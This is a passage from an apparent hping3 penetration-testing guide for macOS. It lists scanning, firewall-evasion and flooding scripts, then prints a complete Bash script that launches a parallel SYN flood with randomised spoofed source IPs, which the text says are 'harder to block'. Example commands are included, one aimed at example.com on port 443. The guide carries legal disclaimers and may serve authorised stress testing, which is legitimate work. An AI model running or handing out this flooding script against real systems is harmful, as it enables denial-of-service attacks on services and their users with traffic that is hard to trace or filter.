– **macOS optimization** – Scripts include platform-specific considerations
– **Comprehensive coverage** – From basic discovery to advanced evasion
– **Safety features** – Built-in protections and confirmation prompts
– **Educational value** – Detailed explanations for learning

Next Steps:
1. Set up your macOS environment with the installation steps
2. Create the script directory and download the scripts
3. Practice on authorized targets or lab environments
4. Integrate with other security tools for comprehensive testing
5. Develop your own custom scripts based on these examples

Remember: These tools are powerful and should be used responsibly. Always prioritize ethical considerations and legal compliance in your security testing activities.

Official Documentation:
– [hping3 Official Website](http://www.hping.org/)
– [hping3 Manual Page](https://linux.die.net/man/8/hping3)

Related Tools:
– **nmap**: Network discovery and port scanning
– **masscan**: High-speed port scanner
– **zmap**: Internet-wide network scanner
– **tcpdump**: Packet capture and analysis

Learning Resources:
– OWASP Testing Guide
– NIST Cybersecurity Framework
– CEH (Certified Ethical Hacker) materials
– OSCP (Offensive Security Certified Professional) training

Script Summary Table:

| Script | Purpose | Key Features |
|--------|---------|--------------|
| `icmp_ping.sh` | Basic host discovery | ICMP connectivity testing |
| `icmp_sweep.sh` | Network enumeration | Bulk host discovery |
| `tcp_syn_ping.sh` | Firewall-resistant discovery | TCP-based host detection |
| `tcp_syn_scan.sh` | Port scanning | Stealth SYN scanning |
| `common_ports_scan.sh` | Service discovery | Predefined port lists |
| `fin_scan.sh` | Stealth scanning | FIN flag evasion |
| `source_port_scan.sh` | Firewall bypass | Source port spoofing |
| `syn_flood_attack.sh` | DoS testing | Multi-process flooding |
| `network_discovery.sh` | Comprehensive recon | Combined techniques |
| `firewall_evasion_test.sh` | Security testing | Multiple evasion methods |

This guide provides everything needed to perform professional-grade penetration testing with hping3 on macOS systems while maintaining ethical and legal standards.

Testing your site's SYN flood resistance using hping3 in parallel

You can build a SYN flood test with hping3 that lets you specify the total number of SYN packets to send and scales horizontally across a chosen number of processes, using a Bash script built around the xargs command. Distributing the workload across multiple parallel processes yields better throughput than a single hping3 instance.
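
The fan-out pattern the script relies on can be sketched in isolation with a harmless command standing in for hping3; the worker count and per-worker packet share are the only moving parts:

```shell
# Split a total packet budget across N parallel workers.
# 'echo' is a stand-in here for the real hping3 invocation.
TOTAL=100
WORKERS=4
PER_WORKER=$((TOTAL / WORKERS))

# xargs -P runs up to $WORKERS commands concurrently; -I {} makes
# each input line from seq available as a worker id.
seq 1 $WORKERS | xargs -I {} -P $WORKERS sh -c "echo worker {}: $PER_WORKER packets"
```

Because the workers run concurrently, the output order may differ between runs.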

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash

# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.

# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified

# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
    echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
    echo ""
    echo "Parameters:"
    echo "  TARGET_IP           - Target IP address or hostname"
    echo "  TARGET_PORT         - Target port number (1-65535)"
    echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
    echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
    echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
    echo ""
    echo "Examples:"
    echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
    echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
    echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
    exit 1
fi

# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"

# Calculate packets per process (integer division: any remainder is dropped,
# so choose PACKET_COUNT_TOTAL divisible by PROCESSES for an exact total)
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))

# Build hping3 command based on randomization option.
# Note: --fast rate-limits each hping3 process to ~10 packets/second,
# so the aggregate rate is roughly 10 x PROCESSES packets/second.
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
    echo "Using randomized source IPs (--rand-source)"
    # Use seq and xargs to parallelize the hping3 command with random source IPs
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
    echo "Using actual source IP (no randomization)"
    # Use seq and xargs to parallelize the hping3 command without source randomization
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi

echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $((PACKETS_PER_PROCESS * PROCESSES))"
echo "========================================"

EOF

chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
sudo ./syn_flood_parallel.sh 192.168.1.1 80 10000 4

# Explicitly enable source IP randomization
sudo ./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true

# Disable source IP randomization (use actual source IP)
sudo ./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false

# High-volume test with randomized IPs
sudo ./syn_flood_parallel.sh example.com 443 100000 8 true

# Test without IP randomization (easier to trace/debug)
sudo ./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (--rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)
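
While the script runs, it helps to confirm on the target host that half-open connections are actually accumulating. The commands below are a sketch; SYN_RCVD is the BSD/macOS state name, and the commented line is the Linux equivalent:

```shell
# macOS / BSD: count TCP connections stuck in the half-open (SYN received) state
netstat -an -p tcp | grep -c SYN_RCVD

# Linux equivalent (run on the target if it is a Linux host):
# ss -tn state syn-recv | wc -l
```

A rising count during the test (and a return to zero afterward) indicates the flood is reaching the target and the backlog is recovering.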

Important Considerations ⚠️

• Permissions: hping3 requires root privileges to craft and send raw packets, so run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Running a SYN flood against a network or system you do not own, or lack explicit written permission to test, is illegal. Use it only in a controlled lab environment or against targets you are authorized to test.
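
Because raw sockets require root, an optional guard near the top of the script (just after the shebang) fails fast with a clear message instead of letting hping3 error out in every worker process. This is a suggested addition, not part of the script above:

```shell
# Abort early unless running as root; hping3 cannot open raw sockets otherwise.
if [ "$(id -u)" -ne 0 ]; then
    echo "Error: run this script with sudo (raw sockets require root)." >&2
    exit 1
fi
```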